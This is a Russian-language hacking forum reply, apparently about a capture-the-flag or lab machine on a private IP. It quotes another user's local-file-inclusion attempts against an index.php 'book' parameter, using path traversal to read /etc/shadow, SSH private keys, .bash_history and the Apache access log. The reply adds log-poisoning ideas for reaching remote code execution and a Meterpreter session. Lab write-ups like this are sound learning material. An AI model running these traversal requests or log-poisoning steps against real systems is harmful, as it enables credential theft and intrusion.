Показать сообщение отдельно

  #13  
Старый 22.07.2021, 10:48
nks1ck
Участник форума
Регистрация: 01.03.2021
Сообщений: 222
С нами: 2739091

Репутация: 0
По умолчанию

Цитата:

Qulan сказал(а):

Exploitation LFI

Из того что знаю я (пока что), я могу:
  1. Попробовать почитать /etc/shadow и в случае успеха получить хеш пароля системного пользователя
  2. Попробовать прочитать id_rsa пользователя miguel и reet
  3. Попробовать почитать .bash_history файл пользователя miguel, возможно там есть креды
  4. Попробовать получить доступ к конфигурационным файлам веб -сервера Apache
Код:
http://192.168.1.191:8593/index.php?book=../../../../etc/shadow
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../home/miguel/.ssh/id_rsa
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../root/.ssh/id_rsa
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../home/miguel/.bash_history
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../var/log/apache2/access.log
- есть контакт)))
По поводу LFI, можешь еще смотреть на /proc/self/environ, там бывает user-agent, который через BurpSuite меняешь на
Код:

Так же есть интересный файл /var/log/auth.log, туда записываются неудачные попытки входа на тот же ssh. Пробуешь зайти на ssh с ником
Код:
""
и смотришь как в терминале
Код:
"Meterpreter session opened"
 
Ответить с цитированием